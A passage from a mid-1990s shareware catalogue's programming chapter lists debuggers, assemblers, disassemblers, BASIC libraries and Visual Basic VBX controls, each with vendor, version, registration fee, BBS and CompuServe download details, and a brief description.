+ + + + these files may be read by full or partial key, read + sequentially, updated, and deleted. + + + Product: RexxBase + Author: American Coders, LTD., 919-846-2014 + Version: 2.00 (05-15-95) + Needs: IBM 80386, OS/2 2.0 or better. 4000k RAM; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $95.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 2 months of phone, + CompuServe, mail support; 1-month limited return policy; + royalty-free runtime license; bonus utilities; disks of other + shareware. 2-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: RXBAS136.ZIP on BBSs (call 703-385-4325 to download it + at no charge); RXBASE.ZIP on CompuServe in CIS:OS2SHARE forum + LIBrary 1 (or contact userID 74150,2370 for assistance). + SWREG#: 1953 + PsL#: 11174 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + An external Rexx function DLL. It allows Rexx procedures to + read/write/update dBase III and IV files. The program handles + both memo fields and indexes. Several other useful functions + are available to improve handling dBase files. + + With this release a front-end program is included to assist in + your database development needs. Create and maintain DBF, DBT, + NDX and MDX files. A simple report generator and data viewer is + included. + + + Product: Schooner + Graphical DOS software development system. See full + description on page 278. + + + 12.3 Debuggers + + See also: Computer programming, Languages, Assembler. + + Chapter 12, "Computer programming" 454 + + + + Product: D86 Debugger + Author: Eric Isaacson Software, 812-339-1811 + Version: 3.22 (01-20-90) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $60.00 (add $7.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, BBS, CompuServe, + mail support; 1-month return policy; bonus utilities; discounts + on other products. Lifetime free upgrading allowed. + Look for: D86V322.ZIP on BBSs (call 812-855-7252 to download it + at no charge); D86.ZIP on CompuServe in CIS:ZIPKEY forum + LIBrary 14 (or contact userID 71333,3154 for assistance). + Download size: 86k (about seven minutes with a 2400 baud modem) + Description: + A full-screen symbolic debugger designed for use with programs + assembled by A86. Has a constantly-updated display of register + values, flag settings, program disassembly near the current + location, and user-selected memory displays in a variety of + formats. Outstanding floating-point display and manipulation + capability. Single-key stepping of both procedures and + individual instructions. + + + 12.4 Languages + + See also: Utilities, System utilities, Batch & macro utilities, + Batch file compilers; Utilities, System utilities, + Configuration utilities; Database applications, Software tools + & add-ins. + + 12.4.1 Assembler + + See also: Computer programming, Debuggers. + + Product: A86 Macro Assembler + Author: Eric Isaacson Software, 812-339-1811 + Version: 3.22 (01-20-90) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $60.00 (add $7.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, BBS, CompuServe, + mail support; 1-month return policy; royalty-free runtime + + Chapter 12, "Computer programming" 455 + + + + license; bonus utilities; discounts on other products. + Lifetime free upgrading allowed. + Look for: A86V322.ZIP on BBSs (call 812-855-7252 to download it + at no charge); A86.ZIP on CompuServe in CIS:ZIPKEY forum + LIBrary 14 (or contact userID 71333,3154 for assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Awards & nominations: 1992 winner, Shareware Industry Awards. + 1986 winner, Public Brand Software contests for useful + programs. + Description: + The finest assembler available, at any price under any terms, + for the IBM PC & compatibles. It is more powerful, easier to + use, five times as fast, and ten times as compact as + Microsoft's MASM assembler. Assembles directly to a COM file, + or produces OBJ files that can be linked to high-level language + programs. + + + Product: DISASTER + Author: Feico Nater Shareware, 31-74-438373 + Version: 1.0 (01-01-92) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $50.00 + Registration benefits: Phone/mail support, free updates. + Look for: DISASTER.* on BBSs; DISASTER.* on GEnie in 0 forum + LIBrary 0. + Download size: 71k (about six minutes with a 2400 baud modem) + Description: + Interactive Disassembler for COM, EXE or SYS files. + Automatically tries to find out what is data or code. If this + is wrong, you can interactively correct it. Comments may be + added to the output. Disassembling may be interrupted at any + time and continued the next day. Recognizes all 8086 80286 + 80386 opcodes, in real mode or protected mode, and also V20 and + V30 opcodes. + + Chapter 12, "Computer programming" 456 + + + + 12.4.2 BASIC + + Product: B7Tool + Author: CareWare, 916-265-8704 + Version: 1.2b (08-06-93) + Needs: IBM PC, DOS 2.1 or better. Microsoft BASIC PDS 7.x. + Registration fee: $20.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support. 1-month + return policy. + Look for: B7T12B.ZIP on BBSs; B7T12B.EXE on CompuServe in + CIS:IBMPRO forum LIBrary 4 (or contact userID 74270,516 for + assistance); B7TOOL12.ZIP on GEnie in IBMPC forum LIBrary 8 (or + contact userID R.CROUCH1 for assistance). + Download size: 94k (about seven minutes with a 2400 baud modem) + Description: + A collection of innovative programming tools for Microsoft + BASIC PDS 7.x. Offers a comprehensive collection of mouse + functions, a complete windowing routine, pull down bar menu, + fast screen writes (ASM), screen save & restore (ASM), get & + set equipment status routines, access to DOS services and more. + B7Tool features 30 of the most commonly needed routines to + create fast, attractive, mouse driven applications. Demo with + source included. + + + Product: BASASM.LIB + Author: Annette Cuomo, 909-591-4956 + Version: 1.0 (06-22-92) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 + Registration benefits: 3 months of support; bonus utilities. + Look for: availability unknown on BBSs; BASASM.ZIP on CompuServe + in ZNT:PROGRAMMIN forum LIBrary 4 (or contact userID 73747,3537 + for assistance). + Download size: 290k (about 22 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Contains numerous low-level assembler language routines that + can be linked in with your BASIC programs. Provides file + handling, screen handling (including scrolling), DOS functions, + etc. + + Chapter 12, "Computer programming" 457 + + + + Product: Basic Program Cross Reference + Version: 1.2 (05-23-93) + Needs: IBM AT (80286), DOS 2.1 or better. 256k RAM. + Registration fee: $15.00 + Registration benefits: 3 months of support; discounts on + upgrades. + Look for: availability unknown on BBSs; BASXRF.ZIP on CompuServe + in CIS:IBMPRO forum LIBrary 4 (or contact userID 71116,302 for + assistance). + Download size: 30k (about two minutes with a 2400 baud modem) + Description: + Provides: + 1. Formatted program listing + 2. User label/line number and variable cross-reference + 3. Reserved word cross-reference. + Any of the three options may be turned on/off in any + combination. Output can be to a printer or file ready to + print. Works for programs written in GWBasic and QuickBasic. + It may work for other dialects as well. Reserved word list can + be user defined. Very easy to use. + + + Product: Basic Training + BASIC language tutorial. See full description on page 485. + + Product: ProWindows LITE for BASIC PDS 7 + Author: DSE Software Publishing, 707-459-4358 + Version: 5.21X (05-21-93) + Needs: IBM PC, DOS 2.11 or better. 640k RAM. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: PWL521X.ZIP on BBSs (call 707-459-4484 to download it + at no charge); PWL521X.ZIP on GEnie in IBMPC forum LIBrary 8 + (or contact userID DSE.SOFTWARE for assistance). + Download size: 129k (about ten minutes with a 2400 baud modem) + Description: + The #1 Windowing Toolbox for MS BASIC PDS 7.1. Create multiple + full color text-based virtual windows that can be moved, + scrolled, re-sized, and hidden via mouse. Fully event-driven + architecture permits self-maintaining user interfaces. Text + mode graphic mouse is incredible. Includes a MS BASIC PDS 7.1 + compatible library, include files, some nifty demos, and + documentation. Join thousands and find out why this is the + best there is! + + Chapter 12, "Computer programming" 458 + + + + Product: ProWindows LITE for QuickBASIC + Author: DSE Software Publishing, 707-459-4358 + Version: 5.21Q (05-21-93) + Needs: IBM PC, DOS 2.11 or better. 640k RAM. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: PWL521Q.ZIP on BBSs (call 707-459-4484 to download it + at no charge); PWL521Q.ZIP on GEnie in IBMPC forum LIBrary 8 + (or contact userID DSE.SOFTWARE for assistance). + Download size: 129k (about ten minutes with a 2400 baud modem) + Description: + The #1 Windowing Toolbox for QuickBASIC 4.5. Create multiple + full color text-based virtual windows that can be moved, + scrolled, re-sized, and hidden via mouse. Fully event-driven + architecture permits self-maintaining user interfaces. Text + mode graphic mouse is incredible. Includes a QuickBASIC 4.5 + compatible library, include files, some nifty demos, and + documentation. Join thousands and find out why this is the + best there is! + + + Product: Q4Tool + Author: CareWare, 916-265-8704 + Version: 1.6b (08-06-93) + Needs: IBM PC, DOS 2.1 or better. Microsoft QuickBASIC 4.x. + Registration fee: $20.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support. 1-month + return policy. + Look for: Q4T16B.ZIP on BBSs; Q4T16B.EXE on CompuServe in + CIS:IBMPRO forum LIBrary 4 (or contact userID 74270,516 for + assistance); Q4TOOL16.ZIP on GEnie in IBMPC forum LIBrary 8 (or + contact userID R.CROUCH1 for assistance). + Download size: 92k (about seven minutes with a 2400 baud modem) + Description: + An innovative collection of programming tools for QuickBASIC + 4.x. Features a comprehensive selection of mouse functions, a + complete windowing routine, fast screen save/restore routines, + fast single routine string writes, pull down bar menu routine, + get/set equipment status routines, access to DOS services and + more. Contains 30 of the most commonly needed routines to + create fast, attractive, mouse driven applications. Demo with + source included. + + + Product: Simply Help! + Create hypertext documents - EXE/TSR/QB/PDS. See full + description on page 484. + + Chapter 12, "Computer programming" 459 + + + + Product: STARTREK the Computer Program + Teaches programming using the Star Trek game. See full + description on page 693. + + 12.4.2.1 Visual BASIC + + Product: AA-Array.DLL + Author: AA-Software International + Version: 1.0 (01-01-95) + Needs: IBM 80386, Windows 3.0 or better. Visual Basic v2.0 or + later. + Strongly recommended: Visual Basic v3.0. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited phone, fax, CompuServe, mail + support; royalty-free source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 6); + discounts on upgrades. Bonus routines for user-defined types + arrays. + Look for: AA-ARRAY.ZIP on BBSs; AAARRY.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 100343,2570 for + assistance). + SWREG#: 4112 + PsL#: 11754 + Download size: 94k (about seven minutes with a 2400 baud modem) + Description: + Manages the creation, accessing, saving to and restoring from + disk of arrays with up to 4 Gigs elements and >64K of VB + strings. No VB imposed limits. Fast. Arrays can be Integer, + Long, Single, Double, Currency, or String. + + + Product: AAVBSORT.DLL + Author: AA-Software International + Version: 1.0 (01-01-95) + Needs: IBM 80386, Windows 3.0 or better. Visual Basic V2.0 or + better. + Strongly recommended: Visual Basic V3.0. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited phone, fax, CompuServe, mail + support; royalty-free source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 6); + + Chapter 12, "Computer programming" 460 + + + + discounts on upgrades. Additional Sort Routines for User + Defined Types. + Look for: AAVBSORT.ZIP on BBSs; AASORT.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 100343,2570 for + assistance). + SWREG#: 3971 + PsL#: 11753 + Download size: 94k (about seven minutes with a 2400 baud modem) + Description: + Sorts VB arrays fast by providing a set of simple to use + routines. The routines, coded in C++, are much faster than a + sort done in Visual Basic. Two types of sort routines are + available: in-place and sort via index. Arrays can be: Integer, + Long, Single, Double, Currency, String, or Fixed String. In the + registered version arrays can be of User defined types. + + + Product: Alarm VBX + Author: Mabry Software, 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: ALARM.ZIP on BBSs (call 206-634-0783 to download it at + no charge); ALARM.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1475 + PsL#: 11091 + Download size: 36k (about three minutes with a 2400 baud modem) + Description: + This control fires an event at various times of the day (under + your control). You can specify times such as 9:12am, 10:45pm, + every hour on the hour, every ten minues, one per minute, etc. + + + Product: BarCod VBX + Author: Mabry Software, 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 461 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: BARCOD.ZIP on BBSs (call 206-634-0783 to download it at + no charge); BARCOD.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1314 + PsL#: 11092 + Download size: 39k (about three minutes with a 2400 baud modem) + Description: + Displays bar codes for you. In supports Code 3 of 9, Code 2 of + 5, and more. Very simple. Place it on your form. Size it to + your liking. Set the bar code style. Then, just set the + Caption property. + + + Product: BmpLst VBX + Author: Mabry Software, 206-634-1443 + Version: 1.8 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $20.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: BMPLST.ZIP on BBSs (call 206-634-0783 to download it at + no charge); BMPLST.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1059 + PsL#: 11093 + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + This control is a list box with bitmaps. Each item in the list + can have both a bitmap and text. The bitmaps can be placed on + any side of the text (top, bottom, left, right). + + + Product: Code.Print for Visual Basic + Author: Caladonia Systems, inc., 206-759-2325 + Version: 2.23 (06-19-95) + Needs: IBM 80386, Windows for Workgroups 3.1 or better. 4000k + RAM; VGA monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Postscript printer; Epson printer; VBRUN300.DLL. + Strongly recommended: SVGA monitor; Hayes-compatible modem. + Registration fee: $32.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; 3-month return policy; + bonus utilities; discounts on other products; discounts on + + Chapter 12, "Computer programming" 462 + + + + upgrades. 12-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs. + Download size: 270k (about 20 minutes with a 2400 baud modem) + Description: + The original VB source code documentation utility - printing + code since 1992. Has Win'95 style interface. Forerunner of the + award winning commercial version, Code.Print Pro (Pinnacle + Publishing Inc.), this defined the VB shareware source code + printing standard. Create presentation quality source code + documents. Full margin control, font selection, indexing and + more. A must have utility for any VB developer. + + + Product: CzarList for VBDOS + Author: CZAR Software, 915-595-8787 + Version: 1.10 (10-29-94) + Needs: IBM AT (80286), DOS 3.2 or better. 240k RAM. + Registration fee: $69.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support; royalty-free runtime + license; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. + Look for: CZLIS110.ZIP on BBSs (call 915-595-8705 to download it + at no charge); CZLIS1.ZIP on CompuServe in CIS:BASIC forum + LIBrary 10 (or contact userID 71031,3614 for assistance). + SWREG#: 2907 + PsL#: 11342 + Download size: 198k (about 15 minutes with a 2400 baud modem) + Description: + Three ListBox Controls for VBDOS Programmers. All controls use + XMS, EMS, or disk space. Bugfixes + Improvm. Store up to 32,765 + items per listbox without using any string space or conv. + memory. CzList is a general listbox, CzDir displays + alphabetically sorted directories in a graphical tree format, + CzFile displays files with size, date, time, attr. + + + Product: DFInfo VBX + Author: Mabry Software, 206-634-1443 + Version: 2.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 463 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: DFINFO.ZIP on BBSs (call 206-634-0783 to download it at + no charge); DFINFO.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1069 + PsL#: 11094 + Download size: 38k (about three minutes with a 2400 baud modem) + Description: + This custom control gives you disk and file information that + Visual Basic doesn't provide. It also allows you to change + some aspects of a file (attributes, size, date, time, etc.). + + + Product: FMDrop VBX + Author: Mabry Software, 206-634-1443 + Version: 1.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: FMDROP.ZIP on BBSs (call 206-634-0783 to download it at + no charge); FMDROP.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1378 + PsL#: 11095 + Download size: 28k (about two minutes with a 2400 baud modem) + Description: + This custom controls notifies you when a file has been dragged + and dropped from the Windows File Manager (FILEMGR). + + + Product: IniCon VBX + Author: Mabry Software, 206-634-1443 + Version: 3.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $5.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 464 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: INICON.ZIP on BBSs (call 206-634-0783 to download it at + no charge); INICON.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 833 + PsL#: 11096 + Download size: 32k (about three minutes with a 2400 baud modem) + Description: + This control makes INI file access simple. WIN.INI and private + INI file access are both supported. No API calls required. + + + Product: JoyStk VBX + Author: Mabry Software, 206-634-1443 + Version: 1.2 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: JOYSTK.ZIP on BBSs (call 206-634-0783 to download it at + no charge); JOYSTK.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1340 + PsL#: 11097 + Download size: 53k (about four minutes with a 2400 baud modem) + Description: + Gives your program information and events about the joystick's + movement and buttons. One or two normal joysticks, one + 4-button joystick (such as a Gravis GamePad), or on 3-D + joystick are supported. + + + Product: MenuEv VBX + Author: Mabry Software, 206-634-1443 + Version: 3.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 465 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: MENUEV.ZIP on BBSs (call 206-634-0783 to download it at + no charge); MENUEV.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1270 + PsL#: 11098 + Download size: 33k (about three minutes with a 2400 baud modem) + Description: + Provides menu selection notification. In other words, it tells + you when the user has selected a menu item. This is really + useful for status bar style help. Really easy to use. All you + need to do is place it on your form. There's nothing to set. + Events start coming in automatically. The events give you the + text and tag of the menu item selected. + + + Product: MS Mega Pack (VBXes) + Author: Mabry Software, 206-634-1443 + Version: 1.0 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $90.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: MSMEGA.ZIP on BBSs (call 206-634-0783 to download it at + no charge); MSMEGA.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 2909 + PsL#: 11462 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + This package includes twelve of Mabry Software's most popular + controls: Alarm, BarCod, BmpLst, DFInfo, FMDrop, IniCon, + JoyStk, MenuEv, PerCnt, RoText, SoundX, and ZipInf. + + + Product: MSlot VBX + Author: Mabry Software, 206-634-1443 + Version: 1.0 (08-14-94) + Needs: IBM 80386, Windows for Workgroups 3.1 or better. Visual + Basic. + Registration fee: $30.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 466 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: MSLOT.ZIP on BBSs (call 206-634-0783 to download it at + no charge); MSLOT.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1848 + Download size: 29k (about two minutes with a 2400 baud modem) + Description: + This custom control for Visual Basic makes mailslot use simple. + No Windows API calls required. + + + Product: PerCnt VBX + Author: Mabry Software, 206-634-1443 + Version: 2.5 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: PERCNT.ZIP on BBSs (call 206-634-0783 to download it at + no charge); PERCNT.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 966 + PsL#: 11100 + Download size: 37k (about three minutes with a 2400 baud modem) + Description: + Displays a percentage bar on your form. This makes status + reporting very easy. 3-D effects, fonts, and colors are all at + your control. + + + Product: Probe VBX + Author: Mabry Software, 206-634-1443 + Version: 1.0 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 467 + + + + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: PROBE.ZIP on BBSs (call 206-634-0783 to download it at + no charge); PROBE.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1338 + PsL#: 11295 + Download size: 47k (about four minutes with a 2400 baud modem) + Description: + This VBX lets you examine and modify other controls' properties + at run-time. After telling it the name of the other control, + it will give you a list of the properties of that control. Can + also display a dialog box that will let you modify other + controls' properties (at run-time). Its dialog box makes it + possible to fiddle with the properties of other controls at + run-time. Common dialog boxes are used for fonts and colors to + make selection easier. + + + Product: RI-VB Database Toolkit v1.1 + Utility to develop VB and Access apps. See full description on + page 491. + + Product: RoText VBX + Author: Mabry Software, 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: ROTEXT.ZIP on BBSs (call 206-634-0783 to download it at + no charge); ROTEXT.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1338 + PsL#: 11101 + Download size: 37k (about three minutes with a 2400 baud modem) + Description: + This control lets you place a label on your forms at any angle + or degree of rotation. This control can be bound to a data + control. + + Chapter 12, "Computer programming" 468 + + + + Product: RUF100.ZIP + Author: MIS Resources International, 404-594-7500 + Version: 1.0 (03-31-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; VGA + monitor; Hard disk; Mouse; VBRUN300.DLL. Visual Basic + Professional 3.0 or higher. + Strongly recommended: XMS memory. + Registration fee: $50.00 (add $3.95 for shipping to U.S. + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, mail support; 3-month return policy; + royalty-free runtime license; site license; all ASP-wide offers + (see page 6); discounts on upgrades. + Look for: RUF100.ZIP on BBSs; RUF100.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 8 (or contact userID 75350,205 for + assistance). + SWREG#: 5262 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A collection of VB modules containing functions for database + access, ini files, help files, date/time validation, message + boxes, mapi, error messages, and other routines and forms. Each + form and function is documented in included help file. Fully + functional. + + + Product: SoundX VBX + Author: Mabry Software, 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: SOUNDX.ZIP on BBSs (call 206-634-0783 to download it at + no charge); SOUNDX.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1272 + PsL#: 11102 + Download size: 36k (about three minutes with a 2400 baud modem) + Description: + This control provides Soundex and Metaphone algorithms. Soundex + and Metaphone convert words or names to codes that represent + how they "sound". This can be really useful in a database + application where users need to find names they may not know + how to spell exactly. Use this control to make it easier for + them. Just put the word or name you want convert in, and the + appropriate codes come out. + + Chapter 12, "Computer programming" 469 + + + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 55. + + Product: ZipInf VBX + Author: Mabry Software, 206-634-1443 + Version: 1.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 6). Lifetime + free upgrading allowed. + Look for: ZIPINF.ZIP on BBSs (call 206-634-0783 to download it at + no charge); ZIPINF.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1595 + PsL#: 11103 + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + This control gives you information about the content + (directory) of a ZIP file. Many, many useful uses (File + Manager replacement, drive searching, etc.). + + + 12.4.3 C + + Product: Animation Kit + Author: ServantWare + Version: 1.0 (04-27-93) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $20.00 + Registration benefits: 3 months of unlimited CompuServe, mail + support; royalty-free source code; all ASP-wide offers (see + page 6). + Look for: ANIMTE.ZIP on BBSs (call 313-663-4173 to download it at + no charge); ANIMTE.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 76636,1166 for assistance). + Download size: 265k (about 20 minutes with a 2400 baud modem) + Description: + Contains robust samples illustrating how to add quality bitmap, + text and cursor animation to your application. Complete with + extensive help file and installation program. + + Chapter 12, "Computer programming" 470 + + + + Product: C xref + Author: DA Software, 313-736-0239 + Version: 3.0a (11-01-93) + Needs: IBM PC, DOS 3.2 